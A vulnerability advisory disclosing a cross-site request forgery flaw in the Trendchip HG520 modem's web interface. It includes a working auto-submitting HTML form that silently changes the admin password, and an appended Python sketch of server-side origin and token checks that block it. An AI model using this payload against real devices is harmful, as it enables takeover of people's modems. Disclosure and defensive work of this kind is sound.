########################################################################
# Exploit Title: Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability
# Google Dork: N/A
# Date: 15/02/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Firmware Version:2.11.38.0(RE0.C2B)3.9.9.5
# Tested on: Embedded Allegro RomPager webserver 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
# Type of Application: Modem Web Application
# CVE: N/A
########################################################################

Cross-Site Request Forgery

This modem's web application suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the user a maliciously crafted URL.

The modem's application does not use any security token to protect against CSRF, so any user data can be manipulated. PoC and exploit to change the user password:

In the PoC, the IP address in the POST is the modem's IP address.

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" action="http://192.168.2.1/Forms/tools_admin_1" name="tool_admin">
<input name="uiViewTools_Password" size="30" maxlength="30" value="admin" type="PASSWORD">
<input name="uiViewTools_PasswordConfirm" size="30" maxlength="30" value="admin" type="PASSWORD">
</form>
</body>
</html>

______________________
*Dhruv Shah* *aka Snypter*
http://security-geek.in/blog/
Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> | Facebook <http://www.facebook.com/dhruvshahs> | Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> | Twitter <https://twitter.com/Snypter> | Blog <http://security-geek.in/blog/>
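
The missing server-side check, sketched as an added example that is not part of the original advisory and not the vendor's firmware code: a state-changing POST is accepted only if it comes from the modem's own origin and carries a token bound to the admin session. The path, form fields and modem address come from the PoC above; the session identifier, the `csrf_token` field name and the key handling are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values: a per-boot secret key and the modem address used in the PoC.
SERVER_KEY = secrets.token_bytes(32)
TRUSTED_HOSTS = {"192.168.2.1"}
PROTECTED_PATHS = {"/Forms/tools_admin_1"}  # password-change handler from the PoC

def issue_csrf_token(session_id: str) -> str:
    """Token the server embeds as a hidden field when it renders the admin form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer) names the modem itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # state-changing POST with no provenance: reject
    return urlsplit(source).hostname in TRUSTED_HOSTS

def check_request(method, path, headers, form, session_id):
    """Return (allowed, reason) for one request to the admin interface."""
    if method != "POST" or path not in PROTECTED_PATHS:
        return True, "not a protected state change"
    if not same_origin(headers):
        return False, "cross-origin or missing Origin/Referer"
    supplied = form.get("csrf_token", "").encode()
    expected = issue_csrf_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time comparison
        return False, "missing or invalid CSRF token"
    return True, "ok"

# Constructed sample requests (not captured traffic).
SESSION = "constructed-session-id"
FIELDS = {"uiViewTools_Password": "admin", "uiViewTools_PasswordConfirm": "admin"}
FORGED = ("POST", "/Forms/tools_admin_1",
          {"Origin": "http://attacker.example"}, dict(FIELDS), SESSION)
NO_TOKEN = ("POST", "/Forms/tools_admin_1",
            {"Origin": "http://192.168.2.1"}, dict(FIELDS), SESSION)
LEGIT = ("POST", "/Forms/tools_admin_1", {"Origin": "http://192.168.2.1"},
         {**FIELDS, "csrf_token": issue_csrf_token(SESSION)}, SESSION)

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("no token", NO_TOKEN), ("legit", LEGIT)):
        print(name, check_request(*req))
```

The forged request fails the origin check, and a same-origin request without the token fails the token check, so the auto-submitting form in the PoC is rejected on both counts.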